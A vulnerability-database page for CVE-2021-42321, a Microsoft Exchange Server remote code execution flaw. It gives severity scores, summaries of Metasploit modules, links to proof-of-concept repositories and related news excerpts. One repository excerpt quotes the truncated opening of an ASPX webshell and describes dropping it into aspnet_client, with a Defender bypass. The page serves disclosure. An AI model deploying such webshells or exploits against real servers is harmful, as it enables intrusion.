Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
580
VMScore

CVE-2021-42321

Published: 10/11/2021 Updated: 28/12/2023
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 580
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
Subscribe to Exchange Server

Vulnerability Summary

Microsoft Exchange Server Remote Code Execution Vulnerability

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft exchange server 2016

microsoft exchange server 2019

Exploits

Exploit DB: Microsoft Exchange Server ChainedSerializationBinder Remote Code Execution
This Metasploit module exploits vulnerabilities within the ChainedSerializationBinder as used in Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and Exchange Server 2016 CU22 all prior to Mar22SU Note that authentication is required to exploit these vulnerabilities ...
Exploit DB: Microsoft Exchange Server Remote Code Execution
This Metasploit module allows remote attackers to execute arbitrary code on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11 prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior to Security Update 2 Note that authentication is required to exploit this v ...

Github Repositories

https://github.com/xnyuq/cve-2021-42321

cve-2021-42321 cve-2021-42321

https://github.com/7BitsTeam/exch_CVE-2021-42321

exch_CVE-2021-42321 本文是7bits安全团队文章《DotNet安全-CVE-2021-42321复现》涉及到的工具 TypeConfuse链改为写入文件,bypass windows definder禁用w3wpexe启动进程。 将此文件覆盖ysoserialnet原始文件,重新编译即可。 欢迎关注我们的公众号 - Zbits2022

https://github.com/DarkSprings/CVE-2021-42321

Microsoft Exchange Server Poc

CVE-2021-42321 Microsoft Exchange Server Poc The patch:msrcmicrosoftcom/update-guide/en-US/vulnerability/CVE-2021-42321

https://github.com/7BitsTeam/CVE-2022-23277

CVE-2022-23277 POC to write a webshell to aspnet_client

exch_CVE-2021-42321 本文是7bits安全团队文章《DotNet安全-CVE-2022-23277漏洞复现》涉及到的工具 认证部分需要通过burpsuite手动添加,利用成功后会在aspnet_client写入1aspx。 webshell: <%@ Page Language="JScript" Debug="true"%><%@Import Namespace="SystemIO"%><%FileWriteAllB

Recent Articles

Let us give thanks that this November, Microsoft has given us just 55 security fixes, two of which are for actively exploited flaws
The Register • Thomas Claburn in San Francisco • 09 Nov 2021

Get our weekly newsletter Light load has infosec bods wondering what awaits next month

Patch Tuesday As the US season of giving thanks and turkey carnage approaches, let us reflect upon Microsoft's November Patch Tuesday, which has bestowed 55 CVEs and the promise of continued employment for the IT admins who have to clean up the recurring mess of software. Only six of the vulnerabilities are considered "Critical," the rest are just "Important." Affected applications include: 3D Viewer, Azure (including RTOS and Sphere), Dynamics, Edge, Exchange Server, Office, Power BI, Role: Win...

Read more...
China is likely stockpiling and deploying vulnerabilities, says Microsoft
The Register

Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Increase in espionage and cyberattacks since law requiring vulnerabilities first be reported to Beijing

Microsoft has asserted that China's offensive cyber capabilities have improved, thanks to a law that has allowed Beijing to create an arsenal of unreported software vulnerabilities. China's 2021 law required organizations to report security vulnerabilities to local authorities before disclosing them to any other entity. The rules mean Beijing can use local research to hoard vulnerability information. A year later, researchers from the Atlantic Council found there was a decrease in reported vulne...

Read more...

References

NVD-CWE-Otherhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42321http://packetstormsecurity.com/files/166153/Microsoft-Exchange-Server-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/168131/Microsoft-Exchange-Server-ChainedSerializationBinder-Remote-Code-Execution.htmlhttps://nvd.nist.govhttps://github.com/xnyuq/cve-2021-42321https://github.com/DarkSprings/CVE-2021-42321https://www.theregister.co.uk/2022/11/07/china_stockpiles_vulnerabilities_microsoft_asserts/
VMScore
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2023-3675CVE-2024-3400CVE-2024-23557mass assignmentCVE-2023-1389local file inclusionCVE-2024-32596file uploadCVE-2024-32593
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook